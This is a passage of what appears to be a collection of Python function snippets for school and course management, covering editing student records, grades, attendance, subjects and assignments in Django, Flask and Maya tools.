cg in course.goals:\n self.db_cursor.execute(INSERT_COURSE_GOALS, (course.name, cg))\n self.db_connection.commit()", "def update_subcategory(self, control_type, *args):\n\n\t\tif control_type is 'intField':\n\t\t\tself.log('query intField and update others')\n\t\t\tintField_value = cmds.intField(self.grade_intField, query = True, value = True)\n\t\t\tself.log('intField is %s' % intField_value)\n\n\t\t\tself.current_grade_value = intField_value\n\t\t\tself.log('current grade is: 
%s' % self.current_grade_value)\n\t\t\tcmds.intSlider(self.grade_slider, edit=True, value = -intField_value)\n\t\t\tself.update_radios_default_comments(intField_value)\n\t\t\tself.update_default_comments()\n\t\t\tself.update_is_complete()\n\t\t\tself.updateFunction()\n\n\t\telif control_type is 'slider':\n\n\t\t\tself.log('query slider and update others')\n\t\t\tslider_value = abs(cmds.intSlider(self.grade_slider, query = True, value = True))\n\t\t\tself.log('intSlider is %s' % slider_value)\n\n\t\t\tself.current_grade_value = slider_value\n\t\t\tself.log('current grade is: %s' % self.current_grade_value)\n\t\t\tcmds.intField(self.grade_intField, edit = True, value = slider_value)\n\t\t\tself.update_radios_default_comments(slider_value)\n\t\t\tself.update_default_comments()\n\t\t\tself.update_is_complete()\n\t\t\tself.updateFunction()\n\n\t\telif control_type is 'radioButton':\n\t\t\tself.log('query radio collection and update others')\n\t\t\tselected = cmds.radioCollection(self.grade_radio_collection, query = True, select = True)\n\t\t\tselected_letter = cmds.radioButton(selected, query = True, label = True)\n\t\t\tselected_letter = re.sub('\\\\+', 'plus', selected_letter)\n\t\t\tself.log('selected radioButton: %s' % selected_letter)\n\n\t\t\tself.current_grade_value = int(self.grade_values.find(selected_letter).text)\n\t\t\tself.log('current grade is: %s' % self.current_grade_value)\n\t\t\tcmds.intField(self.grade_intField, edit = True, value = self.current_grade_value)\n\t\t\tcmds.intSlider(self.grade_slider, edit = True, value = -self.current_grade_value)\n\t\t\tself.log('selected_letter: %s' % selected_letter)\n\t\t\t\n\t\t\tcmds.scrollField(self.default_comments, edit = True, text = self.subcatXML.find('gradeComment').find(selected_letter).text)\n\t\t\tself.current_default_comment_text = cmds.scrollField(self.default_comments, query = True, text = True)\n\t\t\tself.log('Default Comments Updated')\n\t\t\tself.log(self.current_default_comment_text)\n\t\t\tself.update_is_complete()\n\t\t\tself.updateFunction()\n\n\t\telif control_type is 'default_comments_text':\n\t\t\tself.current_default_comment_text = cmds.scrollField(self.default_comments, query = True, text = True)\n\t\t\tself.log('Default Comments Updated')\n\t\t\tself.log(self.current_default_comment_text)\n\t\t\tself.update_is_complete()\n\n\t\telif control_type is 'example_comments_text':\n\t\t\tself.current_example_comment_text = cmds.scrollField(self.example_comments, query = True, text = True)\n\t\t\tself.log('examples updated')\n\t\t\tself.log(self.current_example_comment_text)\n\n\t\telse:\n\t\t\tself.current_comment_text = cmds.scrollField(self.comments_text_field, query = True, text = True)\n\t\t\tself.log('comments updated')\n\t\t\tself.log(self.current_comment_text)", "def modify_assignmentype(request, pk):\n prof = request.user.prof\n assignmentype = Assignmentype.objects.filter(id=pk, prof=prof).first()\n if assignmentype:\n if request.method == 'POST':\n form = LightAssignmentypeForm(request.POST, instance=assignmentype)\n if form.is_valid():\n form.save()\n return redirect('/detail_assignmentype/%s/' % assignmentype.pk)\n else:\n form = LightAssignmentypeForm(instance=assignmentype)\n context = {}\n context['assignmentype_id'] = assignmentype.id\n context['message'] = 'Modify details of your assignment '\\\n '(keep current student list)'\n context['form'] = form\n context['type_post'] = 'modify'\n return render(request, 'gradapp/assignmentype_form.html', context)\n else:\n return redirect('gradapp:index')", "def 
edit_student(request, student_id):\n\n\temp = models.Teacher.objects.get(user=request.user)\n\tif not emp.student_permit:\n\t\traise Http404\n\tstudent = models.Student.objects.filter(\n\t\tpk=student_id, soft_delete=False\n\t).first()\n\tif not student:\n\t\traise Http404\n\tcontext_dict = {\n\t\t\"all_courses\": context_helper.course_helper(),\n\t\t\"blood_groups\": context_helper.blood_group_helper(),\n\t\t\"guardian_types\": context_helper.guardian_type_helper(),\n\t\t\"gender_types\": context_helper.gender_helper(),\n\t\t'student_id': student_id\n\t}\n\tif request.method == 'POST':\n\t\tupdate_fields = []\n\t\tactivity = ''\n\t\tsname = request.POST.get('sname')\n\t\troll = request.POST.get('rno')\n\t\tdob = request.POST.get('dob')\n\t\tgender = request.POST.get('gender_picker')\n\t\tbgroup = request.POST.get('blood_group_picker')\n\t\tif bgroup == 'Choose option':\n\t\t\tbgroup = None\n\t\tphone = request.POST.get('phone')\n\t\tcurradd = request.POST.get('curradd')\n\t\tpermadd = request.POST.get('permadd')\n\t\tgname = request.POST.get('gname')\n\t\tcourse = request.POST.get('course_picker')\n\t\tbatch = request.POST.get('batch')\n\t\tgtype = request.POST.get('guardian_type_picker')\n\t\tgphone = request.POST.get('gphone')\n\t\temail = request.POST.get('email')\n\t\taddress_flag = request.POST.get('address_flag')\n\t\tprint(address_flag)\n\t\taddress_flag = True if address_flag == 'on' else False\n\t\tif address_flag == True:\n\t\t\tpermadd = curradd\n\t\ttry:\n\t\t\tif \"profile-img\" in request.FILES:\n\t\t\t\tstudent.photo = request.FILES[\"profile-img\"]\n\t\t\t\tupdate_fields.append('photo')\n\t\t\t\tactivity += 'Changed photo.\\n'\n\t\t\tif student.name != sname:\n\t\t\t\tstudent.name = sname\n\t\t\t\tupdate_fields.append('name')\n\t\t\t\tactivity += 'Changed name to '+ str(sname) +'.\\n'\n\t\t\tif student.roll_no != roll:\n\t\t\t\tstudent.roll_no = roll\n\t\t\t\tupdate_fields.append('roll_no')\n\t\t\t\tactivity += 'Changed roll number to '+ str(roll) +'.\\n'\n\t\t\tif str(student.dob) != str(dob):\n\t\t\t\tstudent.dob = dob\n\t\t\t\tupdate_fields.append('dob')\n\t\t\t\tactivity += 'Changed DOB to ' + str(dob) + '.\\n'\n\t\t\tif student.gender != gender:\n\t\t\t\tstudent.gender = gender\n\t\t\t\tupdate_fields.append('gender')\n\t\t\t\tactivity += 'Changed gender to ' + str(gender) + '.\\n'\n\t\t\tif student.blood_group != bgroup:\n\t\t\t\tstudent.blood_group = bgroup\n\t\t\t\tupdate_fields.append('blood_group')\n\t\t\t\tactivity += 'Changed blood group to ' + str(bgroup) + '.\\n'\n\t\t\tif student.phone != phone:\n\t\t\t\tstudent.phone = phone\n\t\t\t\tupdate_fields.append('phone')\n\t\t\t\tactivity += 'Changed phone number to ' + str(phone) + '.\\n'\n\t\t\tif student.curr_address != curradd:\n\t\t\t\tstudent.curr_address = curradd\n\t\t\t\tupdate_fields.append('curr_address')\n\t\t\t\tactivity += 'Changed current address to ' + str(curradd) + '.\\n'\n\t\t\tif student.perm_address != permadd:\n\t\t\t\tstudent.perm_address = permadd\n\t\t\t\tupdate_fields.append('perm_address')\n\t\t\t\tactivity += 'Changed permanent address to ' + str(permadd) + '.\\n'\n\t\t\tif student.guardian_name != gname:\n\t\t\t\tstudent.guardian_name = gname\n\t\t\t\tupdate_fields.append('guardian_name')\n\t\t\t\tactivity += 'Changed guardian name to ' + str(gname) + '.\\n'\n\t\t\tif 
student.guardian_phone != gphone:\n\t\t\t\tstudent.guardian_phone = gphone\n\t\t\t\tupdate_fields.append('guardian_phone')\n\t\t\t\tactivity += 'Changed guardian phone to ' + str(gphone) + '.\\n'\n\t\t\tif student.guardian_type != gtype:\n\t\t\t\tstudent.guardian_type = gtype\n\t\t\t\tupdate_fields.append('guardian_type')\n\t\t\t\tactivity += 'Changed guardian type to ' + str(gtype) + '.\\n'\n\t\t\tif str(student.course.pk) != str(course):\n\t\t\t\tstudent.course = models.Course.objects.get(pk=course)\n\t\t\t\tupdate_fields.append('course')\n\t\t\t\tactivity += 'Changed course to ' + str(course) + '.\\n'\n\t\t\tif student.batch != batch:\n\t\t\t\tstudent.batch = batch\n\t\t\t\tupdate_fields.append('batch')\n\t\t\t\tactivity += 'Changed batch to ' + str(batch) + '.\\n'\n\t\t\tif student.email != email:\n\t\t\t\tstudent.email = email\n\t\t\t\tupdate_fields.append('email')\n\t\t\t\tactivity += 'Changed email to ' + str(email) + '.\\n'\n\t\t\tif student.address_flag != address_flag:\n\t\t\t\tstudent.address_flag = address_flag\n\t\t\t\tupdate_fields.append('address_flag')\n\t\t\t\tactivity += 'Changed address flag.'\n\t\t\tstudent.save(update_fields=update_fields)\n\t\t\thistory = models.History(\n\t\t\t\tuser=emp,\n\t\t\t\tactivity=activity,\n\t\t\t\tactivity_type=\"edit student\"\n\t\t\t)\n\t\t\thistory.save()\n\t\t\tcontext_dict[\"message\"] = 'Successfully updated student.'\n\t\t\tcontext_dict[\"success\"] = True\n\t\texcept Exception as e:\n\t\t\tcontext_dict[\"message\"] = str(e)\n\t\t\tcontext_dict[\"success\"] = False\n\t\t\tprint(e)\n\tcontext_dict.update(context_helper.get_student_info(student))\n\tif type(context_dict['dob']) == str:\n\t\tcontext_dict['dob'] = datetime.strptime(context_dict['dob'], '%Y-%m-%d')\n\tfor i in context_dict['course']:\n\t\ttry: del context_dict['all_courses'][i]\n\t\texcept: pass\n\tfor i in context_dict['blood_group']:\n\t\ttry: context_dict['blood_groups'].remove(i)\n\t\texcept: pass\n\tfor i in context_dict['guardian_type']:\n\t\ttry: context_dict['guardian_types'].remove(i)\n\t\texcept: pass\n\tfor i in context_dict['gender_type']:\n\t\ttry: context_dict['gender_types'].remove(i)\n\t\texcept: pass\n\tif context_dict.get('success', False):\n\t\treturn HttpResponseRedirect('/view-students')\n\treturn render(\n\t\trequest, \"editStudent.html\", context_dict\n\t)", "def __ui_grade_student(self):\n student_id = input(\"Give student ID: \")\n discipline_name = input(\"Give discipline name: \")\n\n try:\n grade_value = input(\"Give grade: \")\n if not self.__student_controller.student_has_discipline(student_id, discipline_name):\n print(\"The student isn't enrolled at the given discipline!\")\n return\n self.__grade_controller.add_grade(\n student_id,\n self.__discipline_controller.get_id_by_name(discipline_name),\n grade_value\n )\n print(\"Grade successful! 
\\n\")\n\n except GradeException as ge:\n print(ge)\n return\n except StudentException as se:\n print(se)\n return\n except RepositoryException as re:\n print(re)\n return\n except ValueError as ve:\n print(ve)\n return", "def add_grades(self, request, pk=None):\n\n instance = self.get_object()\n try:\n user = self.request.user\n query = models.StudentSubject.objects.filter(\n subject__teacher__user=user,\n subject=instance\n )\n serializer = self.get_serializer(query, many=True)\n \n id = self.request.query_params.get('id')\n\n if id:\n q = get_object_or_404(\n models.StudentSubject,\n pk=id,\n subject=instance\n )\n return self.filtering(request, q)\n return Response(serializer.data)\n except:\n raise except_handler.ActionDecor()", "def modify_an_entry(self):\n target_list = self.find_student()\n\n if not len(target_list):\n print('There is no contents to show')\n else:\n opt = self.input_options(['midterm', 'finalterm'], 1, 'Which test do you want to modify?')\n score = self.input_score()\n\n if opt.upper() == 'MIDTERM':\n for idx in target_list.index:\n self.student_list.loc[self.student_list.index == idx, 'midterm'] = score\n else:\n for idx in target_list.index:\n self.student_list.loc[self.student_list.index == idx, 'finalterm'] = score", "def insert_question_assignmentype(request, pk, cd):\n prof = request.user.prof\n assignmentype = Assignmentype.objects.filter(id=pk, prof=prof).first()\n cd = int(cd)\n if cd == 1:\n classForm = AddQuestionForm\n info = 'Add'\n elif cd == -1:\n classForm = RemoveQuestionForm\n info = 'Remove'\n if assignmentype:\n if request.method == 'POST':\n form = classForm(request.POST,\n nb_questions=assignmentype.nb_questions)\n if form.is_valid():\n question = form.cleaned_data['question']\n # Modify attribute question of all associated evalquestion\n if cd == -1:\n evalquestions = Evalquestion.objects.filter(\n evalassignment__assignment__assignmentype=assignmentype,\n question=question)\n evalquestions.delete()\n evalquestions = Evalquestion.objects.filter(\n evalassignment__assignment__assignmentype=assignmentype,\n question__gte=question)\n evalquestions.update(question=F('question') + cd)\n # Create a new evalquestion for each evalassignment (if cd=1)\n # and inform that it has to be graded\n for evalassignment in Evalassignment.objects.filter(\n assignment__assignmentype=assignmentype):\n if cd == 1:\n Evalquestion.objects.create(\n evalassignment=evalassignment, question=question)\n evalassignment.reset_grade()\n elif cd == -1:\n evalassignment.grade_assignment = None\n evalassignment.save()\n # Add a question to the assignmentype\n assignmentype.nb_questions += cd\n if cd == 1:\n if assignmentype.questions_coeff:\n assignmentype.questions_coeff.insert(question - 1, None)\n if assignmentype.questions_statement:\n assignmentype.questions_statement.insert(question - 1,\n None)\n assignmentype.save()\n elif cd == -1:\n if assignmentype.questions_coeff:\n del assignmentype.questions_coeff[question - 1]\n if assignmentype.questions_statement:\n del assignmentype.questions_statement[question - 1]\n assignmentype.save()\n log = tasks.compute_grades_assignmentype(assignmentype.pk)\n logger.info(log)\n return redirect('/detail_assignmentype/%s/' % assignmentype.pk)\n form = classForm(nb_questions=assignmentype.nb_questions)\n context = {'assignmentype': assignmentype, 'form': form, 'info': info,\n 'cd': cd}\n return render(request, 'gradapp/insert_question.html', context)\n else:\n return redirect('gradapp:index')", "def edit(self, **kwargs):\n ...", "def 
save_grade(request, course_id):\r\n\r\n    course_key = SlashSeparatedCourseKey.from_deprecated_string(course_id)\r\n    _check_access(request.user, course_key)\r\n\r\n    if request.method != 'POST':\r\n        raise Http404\r\n    p = request.POST\r\n    required = set(['score', 'feedback', 'submission_id', 'location', 'submission_flagged'])\r\n    skipped = 'skipped' in p\r\n    #If the instructor has skipped grading the submission, then there will not be any rubric scores.\r\n    #Only add in the rubric scores if the instructor has not skipped.\r\n    if not skipped:\r\n        required.add('rubric_scores[]')\r\n    actual = set(p.keys())\r\n    missing = required - actual\r\n    if len(missing) > 0:\r\n        return _err_response('Missing required keys {0}'.format(\r\n            ', '.join(missing)))\r\n\r\n    success, message = check_feedback_length(p)\r\n    if not success:\r\n        return _err_response(message)\r\n\r\n    grader_id = unique_id_for_user(request.user)\r\n\r\n    location = course_key.make_usage_key_from_deprecated_string(p['location'])\r\n\r\n    try:\r\n        result = staff_grading_service().save_grade(course_key,\r\n                                                    grader_id,\r\n                                                    p['submission_id'],\r\n                                                    p['score'],\r\n                                                    p['feedback'],\r\n                                                    skipped,\r\n                                                    p.getlist('rubric_scores[]'),\r\n                                                    p['submission_flagged'])\r\n    except GradingServiceError:\r\n        #This is a dev_facing_error\r\n        log.exception(\r\n            \"Error saving grade in the staff grading interface in open ended grading. Request: {0} Course ID: {1}\".format(\r\n                request, course_id))\r\n        #This is a staff_facing_error\r\n        return _err_response(STAFF_ERROR_MESSAGE)\r\n    except ValueError:\r\n        #This is a dev_facing_error\r\n        log.exception(\r\n            \"save_grade returned broken json in the staff grading interface in open ended grading\")\r\n        #This is a staff_facing_error\r\n        return _err_response(STAFF_ERROR_MESSAGE)\r\n\r\n    if not result.get('success', False):\r\n        #This is a dev_facing_error\r\n        log.warning(\r\n            'Got success=False from staff grading service in open ended grading. Response: {0}'.format(result))\r\n        return _err_response(STAFF_ERROR_MESSAGE)\r\n\r\n    # Ok, save_grade seemed to work. 
Get the next submission to grade.\r\n    return HttpResponse(json.dumps(_get_next(course_id, grader_id, location)),\r\n                        mimetype=\"application/json\")", "def edit_subject(request,subject_id):\n\n\temp = models.Teacher.objects.get(user=request.user)\n\tif not emp.subject_permit:\n\t\traise Http404\n\tsubject = models.Subject.objects.filter(\n\t\tpk=subject_id, soft_delete=False\n\t).first()\n\tif not subject:\n\t\traise Http404\n\tcontext_dict = {\n\t\t\"all_courses\": context_helper.course_helper(),\n\t\t\"subject_types\": context_helper.subject_type_helper(),\n\t\t'subject_id': subject_id,\n\t}\n\tif request.method == 'POST':\n\t\tupdate_fields = []\n\t\tactivity = ''\n\t\tcourse = request.POST.get('course_picker')\n\t\tname = request.POST.get('sname')\n\t\tsid = request.POST.get('sid')\n\t\tstype = request.POST.get('subject_picker')\n\t\tmaxmarks = request.POST.get('marks')\n\t\ttry:\n\t\t\tif str(subject.course.pk) != str(course):\n\t\t\t\tsubject.course = models.Course.objects.get(pk=course)\n\t\t\t\tupdate_fields.append('course')\n\t\t\t\tactivity += 'Changed course to ' + str(course) + '.\\n'\n\t\t\tif subject.s_type != stype:\n\t\t\t\tsubject.s_type = stype\n\t\t\t\tupdate_fields.append('s_type')\n\t\t\t\tactivity += 'Changed subject type to ' + str(stype) + '.\\n'\n\t\t\tif subject.name != name:\n\t\t\t\tsubject.name = name\n\t\t\t\tupdate_fields.append('name')\n\t\t\t\tactivity += 'Changed subject name to ' + str(name) + '.\\n'\n\t\t\tif subject.s_id != sid:\n\t\t\t\tsubject.s_id = sid\n\t\t\t\tupdate_fields.append('s_id')\n\t\t\t\tactivity += 'Changed subject ID to ' + str(sid) + '.\\n'\n\t\t\tif subject.max_marks != maxmarks:\n\t\t\t\tsubject.max_marks = maxmarks\n\t\t\t\tupdate_fields.append('max_marks')\n\t\t\t\tactivity += 'Changed maximum marks to ' + str(maxmarks) + '.\\n'\n\t\t\tsubject.save(update_fields=update_fields)\n\t\t\thistory = models.History(\n\t\t\t\tuser=emp,\n\t\t\t\tactivity=activity,\n\t\t\t\tactivity_type=\"edit subject\"\n\t\t\t)\n\t\t\thistory.save()\n\t\t\tcontext_dict[\"message\"] = 'Successfully updated Subject.'\n\t\t\tcontext_dict[\"success\"] = True\n\t\texcept Exception as e:\n\t\t\tcontext_dict[\"message\"] = str(e)\n\t\t\tcontext_dict[\"success\"] = False\n\t\t\tprint(e)\n\tcontext_dict.update(context_helper.get_subject_info(subject))\n\tfor i in context_dict['courses']:\n\t\ttry: del context_dict['all_courses'][i]\n\t\texcept: pass\n\tfor i in context_dict['subject_type']:\n\t\ttry: context_dict['subject_types'].remove(i)\n\t\texcept: pass\n\tif context_dict.get('success', False):\n\t\treturn HttpResponseRedirect('/view-subjects')\n\treturn render(\n\t\trequest, \"editSubject.html\", context_dict\n\t)", "def edit_person(self, pk):", "def _grade(student, request, course, keep_raw_scores):\r\n    grading_context = course.grading_context\r\n    raw_scores = []\r\n\r\n    # Dict of item_ids -> (earned, possible) point tuples. 
This *only* grabs\r\n # scores that were registered with the submissions API, which for the moment\r\n # means only openassessment (edx-ora2)\r\n submissions_scores = sub_api.get_scores(\r\n course.id.to_deprecated_string(), anonymous_id_for_user(student, course.id)\r\n )\r\n\r\n totaled_scores = {}\r\n # This next complicated loop is just to collect the totaled_scores, which is\r\n # passed to the grader\r\n for section_format, sections in grading_context['graded_sections'].iteritems():\r\n format_scores = []\r\n for section in sections:\r\n section_descriptor = section['section_descriptor']\r\n section_name = section_descriptor.display_name_with_default\r\n\r\n # some problems have state that is updated independently of interaction\r\n # with the LMS, so they need to always be scored. (E.g. foldit.,\r\n # combinedopenended)\r\n should_grade_section = any(\r\n descriptor.always_recalculate_grades for descriptor in section['xmoduledescriptors']\r\n )\r\n\r\n # If there are no problems that always have to be regraded, check to\r\n # see if any of our locations are in the scores from the submissions\r\n # API. If scores exist, we have to calculate grades for this section.\r\n if not should_grade_section:\r\n should_grade_section = any(\r\n descriptor.location.to_deprecated_string() in submissions_scores\r\n for descriptor in section['xmoduledescriptors']\r\n )\r\n\r\n if not should_grade_section:\r\n with manual_transaction():\r\n should_grade_section = StudentModule.objects.filter(\r\n student=student,\r\n module_state_key__in=[\r\n descriptor.location for descriptor in section['xmoduledescriptors']\r\n ]\r\n ).exists()\r\n\r\n # If we haven't seen a single problem in the section, we don't have\r\n # to grade it at all! We can assume 0%\r\n if should_grade_section:\r\n scores = []\r\n\r\n def create_module(descriptor):\r\n '''creates an XModule instance given a descriptor'''\r\n # TODO: We need the request to pass into here. If we could forego that, our arguments\r\n # would be simpler\r\n with manual_transaction():\r\n field_data_cache = FieldDataCache([descriptor], course.id, student)\r\n return get_module_for_descriptor(student, request, descriptor, field_data_cache, course.id)\r\n\r\n for module_descriptor in yield_dynamic_descriptor_descendents(section_descriptor, create_module):\r\n\r\n (correct, total) = get_score(\r\n course.id, student, module_descriptor, create_module, scores_cache=submissions_scores\r\n )\r\n if correct is None and total is None:\r\n continue\r\n\r\n if settings.GENERATE_PROFILE_SCORES: \t# for debugging!\r\n if total > 1:\r\n correct = random.randrange(max(total - 2, 1), total + 1)\r\n else:\r\n correct = total\r\n\r\n graded = module_descriptor.graded\r\n if not total > 0:\r\n #We simply cannot grade a problem that is 12/0, because we might need it as a percentage\r\n graded = False\r\n\r\n scores.append(Score(correct, total, graded, module_descriptor.display_name_with_default))\r\n\r\n _, graded_total = graders.aggregate_scores(scores, section_name)\r\n if keep_raw_scores:\r\n raw_scores += scores\r\n else:\r\n graded_total = Score(0.0, 1.0, True, section_name)\r\n\r\n #Add the graded total to totaled_scores\r\n if graded_total.possible > 0:\r\n format_scores.append(graded_total)\r\n else:\r\n log.exception(\"Unable to grade a section with a total possible score of zero. 
\" +\r\n str(section_descriptor.location))\r\n\r\n totaled_scores[section_format] = format_scores\r\n\r\n grade_summary = course.grader.grade(totaled_scores, generate_random_scores=settings.GENERATE_PROFILE_SCORES)\r\n\r\n # We round the grade here, to make sure that the grade is an whole percentage and\r\n # doesn't get displayed differently than it gets grades\r\n grade_summary['percent'] = round(grade_summary['percent'] * 100 + 0.05) / 100\r\n\r\n letter_grade = grade_for_percentage(course.grade_cutoffs, grade_summary['percent'])\r\n grade_summary['grade'] = letter_grade\r\n grade_summary['totaled_scores'] = totaled_scores \t# make this available, eg for instructor download & debugging\r\n if keep_raw_scores:\r\n grade_summary['raw_scores'] = raw_scores # way to get all RAW scores out to instructor\r\n # so grader can be double-checked\r\n return grade_summary", "def editDetail(id):\n form = EditDetailForm(request.form)\n if request.method == \"GET\":\n return render_template(\"/pages/edit.html\", form=form)\n else:\n choose = True\n section = form.category.data\n return redirect(url_for(\"editDetailSection\", id=id ,section=section))", "def edit_attendance(request, attendance_id):\n\n\temp = models.Teacher.objects.get(user=request.user)\n\tif not emp.student_permit:\n\t\traise Http404\n\tattendance = models.Attendance.objects.filter(\n\t\tpk=attendance_id, soft_delete=False\n\t).first()\n\tprint(\"1\")\n\tcontext_dict = {\n\t\t\"all_subjects\": context_helper.subject_helper(),\n\t\t'attendance_id': attendance_id,\n\t}\n\tif request.method == 'POST':\n\t\tupdate_fields = []\n\t\tactivity = ''\n\t\troll = request.POST.get('roll')\n\t\tsubject = request.POST.get('subject_picker')\n\t\tobtained = request.POST.get('attendance')\n\t\ttotal = request.POST.get('total')\n\t\tstudent = models.Student.objects.filter(\n\t\t\troll_no=roll\n\t\t).first()\n\t\tif not student:\n\t\t\tcontext_dict[\"message\"] = 'Student at does not exist / Roll number has not been alloted.'\n\t\t\treturn render(request, \"editAttendance.html\", context_dict)\n\t\ttry:\n\t\t\tif attendance.student != student:\n\t\t\t\tattendance.student = student\n\t\t\t\tupdate_fields.append('student')\n\t\t\t\tactivity += 'Changed student to ' + str(student) + '.\\n'\n\t\t\tif attendance.total_attendance != total:\n\t\t\t\tattendance.total_attendance = total\n\t\t\t\tupdate_fields.append('total_attendance')\n\t\t\t\tactivity += 'Changed total attendance to ' + str(total) + '.\\n'\n\t\t\tif attendance.obtained_attendance != obtained:\n\t\t\t\tattendance.obtained_attendance = obtained\n\t\t\t\tupdate_fields.append('obtained_attendance')\n\t\t\t\tactivity += 'Changed obtained attendance to' + str(obtained) + '.\\n'\n\t\t\tif str(attendance.subject.pk) != str(subject):\n\t\t\t\tattendance.subject = models.Subject.objects.get(pk=subject)\n\t\t\t\tupdate_fields.append('subject')\n\t\t\t\tactivity += 'Changed subject to ' + str(subject) + '.\\n'\n\t\t\tattendance.save(update_fields=update_fields)\n\t\t\thistory = models.History(\n\t\t\t\tuser=emp,\n\t\t\t\tactivity=activity,\n\t\t\t\tactivity_type=\"edit attendance\"\n\t\t\t)\n\t\t\thistory.save()\n\t\t\tcontext_dict[\"message\"] = 'Successfully updated Attendance.'\n\t\t\tcontext_dict[\"success\"] = True\n\t\texcept Exception as e:\n\t\t\tcontext_dict[\"message\"] = str(e)\n\t\t\tcontext_dict[\"success\"] = False\n\t\t\tprint(e)\n\tcontext_dict.update(context_helper.get_attendance_info(attendance))\n\tfor i in context_dict['subjects']:\n\t\t# use for dynamic\n\t\ttry: del 
context_dict['all_subjects'][i]\n\t\texcept: pass\n\tif context_dict.get('success', False):\n\t\treturn HttpResponseRedirect('/view-attendance')\n\treturn render(\n\t\trequest, \"editAttendance.html\", context_dict\n\t)", "def put(self, id=None):\n\n if not id:\n return {'msg':'Missing achievement id.'}, 400\n\n if not all(\n [request.form.get('roll_no'),\n request.form.get('name'),\n request.form.get('batch'),\n request.form.get('programme'),\n request.form.get('category'),]):\n \n return {'msg':'Field(s) missing.'}, 400\n\n try:\n ach = AcademicAchievement.query.get(id)\n\n if not ach:\n return {'msg':'Academic achievement not found'}, 404\n\n ach.roll_no = request.form.get('roll_no')\n ach.name = request.form.get('name')\n ach.batch = checkBatch(request.form.get('batch'))\n ach.programme = request.form.get('programme')\n ach.category = request.form.get('category')\n\n ach.save()\n data = ach.toDict()\n\n return {'data' : data}, 200\n\n except (ValueError, mongoalchemy.exceptions.BadValueException) as e:\n print(e)\n return {'msg':'Invalid form data.'}, 400\n\n except Exception as e:\n print(e)\n return {'msg':'Could not modify academic achievement.'}, 500", "def updateStudentProposalReferences(request):\n\n return updateReferencesForModel('student_proposal')", "def AddGrade(self, student, discipline, grade_value):\n if not self.__data['s'].HasKey(student.ID):\n raise NonExistentItemIDError(\"Student does not exist.\")\n if not self.__data['d'].HasKey(discipline.ID):\n raise NonExistentItemIDError(\"Discipline does not exist.\")\n self.__data['g'].AddItems([Grade(self.__data['g'].GetSafeKey(), student.ID, discipline.ID, grade_value)])\n self.__undo_list.append(['g'])\n self.__redo_list.clear()", "def update_attempt_with_grading(db, attempt_id, grading):\n attrs = {}\n if grading['is_solution']:\n attrs['is_unsolved'] = False\n if grading['is_full_solution']:\n attrs['is_fully_solved'] = True\n if len(attrs) > 0:\n db.update_row(db.tables.attempts, attempt_id, attrs)", "def editConcept(self):\n if self.concept_list.currentIndex().isValid():\n concept = self.concept_list.selectedItems()[0].data(Qt.UserRole)[0]\n subcategory = self.concept_list.selectedItems()[0].data(Qt.UserRole)[1]\n dlg = EditConceptDialog(self, concept, subcategory)\n if dlg.exec_():\n concept, subcategory = dlg.getValue()\n self.db.update_concept(concept)\n self.db.update_subcategory(subcategory)\n self.search()", "def save(self, *args, **kwargs):\n super(CurriculumGuideSection, self).save(*args, **kwargs)\n self.clean()", "def update_employee(employee):\n employee_id = get_employee_input_int(\"Enter the employee id you want to update\")\n newGrade = get_employee_input_int(\"Enter the new grade for \")\n db.update_employee(employee_id, newGrade)\n print(employee.full_name + \"'s grade value has been updated to :-> \", newGrade)", "def change_view(self, request, object_id, form_url='', extra_context=None):\n section = models.Section.objects.filter(pk=object_id)\\\n .prefetch_related(\"facility__experiment\",\n \"participants\")\\\n .first()\n exp_id = section.facility.experiment.id\n # create bulk forms\n bulk_add_change_frm = create_bulk_add_change_form(request, exp_id)\n bulk_del_frm = create_bulk_delete_form(request)\n # attach site id and bulk forms to 'extra_context'\n extra_context = extra_context or {}\n extra_context['section_id'] = object_id\n extra_context[\"bulk_add_change_form\"] = bulk_add_change_frm\n extra_context['bulk_delete_form'] = bulk_del_frm\n # print extra_context\n return super(SectionAdmin, 
self).change_view(\n request, object_id, form_url, extra_context=extra_context)", "def updateStudents(request):\n\n return updateRole('gsoc_student')", "def set_grade(\n self,\n assignment_id,\n student_id,\n grade_value,\n gradebook_id='',\n **kwargs\n ):\n # pylint: disable=too-many-arguments\n\n # numericGradeValue stringified because 'x' is a possible\n # value for excused grades.\n grade_info = {\n 'studentId': student_id,\n 'assignmentId': assignment_id,\n 'mode': 2,\n 'comment': 'from MITx {0}'.format(time.ctime(time.time())),\n 'numericGradeValue': str(grade_value),\n 'isGradeApproved': False\n }\n grade_info.update(kwargs)\n log.info(\n \"student %s set_grade=%s for assignment %s\",\n student_id,\n grade_value,\n assignment_id)\n return self.post(\n 'grades/{gradebookId}'.format(\n gradebookId=gradebook_id or self.gradebook_id\n ),\n data=grade_info,\n )", "def update(self, request, pk=None):\n current_user = User.objects.get(id=request.user.id)\n if current_user.is_staff:\n try:\n category = Category.objects.get(pk=pk)\n except Category.DoesNotExist:\n return Response({\"reason\": \"Doesn't Exist\"}, status=status.HTTP_400_BAD_REQUEST)\n category.label = request.data['label']\n category.approved = False\n try:\n category.save()\n return Response({}, status=status.HTTP_204_NO_CONTENT)\n except ValidationError as ex:\n return Response({\"reason\": ex.message}, status=status.HTTP_400_BAD_REQUEST)\n else:\n return Response({'message': \"*Sigh*, you're not changing a thing, non-admin\"},\n status=status.HTTP_403_FORBIDDEN)", "def edit_classifications(self, identifier_type, identifier):\n self.require_librarian(flask.request.library)\n\n work = self.load_work(flask.request.library,\n identifier_type, identifier)\n if isinstance(work, ProblemDetail):\n return work\n\n staff_data_source = DataSource.lookup(\n self._db, DataSource.LIBRARY_STAFF)\n\n # Previous staff classifications\n primary_identifier = work.presentation_edition.primary_identifier\n old_classifications = self._db \\\n .query(Classification) \\\n .join(Subject) \\\n .filter(\n Classification.identifier == primary_identifier,\n Classification.data_source == staff_data_source\n )\n old_genre_classifications = old_classifications \\\n .filter(Subject.genre_id != None)\n old_staff_genres = [\n c.subject.genre.name\n for c in old_genre_classifications\n if c.subject.genre\n ]\n old_computed_genres = [\n work_genre.genre.name\n for work_genre in work.work_genres\n ]\n\n # New genres should be compared to previously computed genres\n new_genres = flask.request.form.getlist(\"genres\")\n genres_changed = sorted(new_genres) != sorted(old_computed_genres)\n\n # Update audience\n new_audience = flask.request.form.get(\"audience\")\n if new_audience != work.audience:\n # Delete all previous staff audience classifications\n for c in old_classifications:\n if c.subject.type == Subject.FREEFORM_AUDIENCE:\n self._db.delete(c)\n\n # Create a new classification with a high weight\n primary_identifier.classify(\n data_source=staff_data_source,\n subject_type=Subject.FREEFORM_AUDIENCE,\n subject_identifier=new_audience,\n weight=WorkController.STAFF_WEIGHT,\n )\n\n # Update target age if present\n 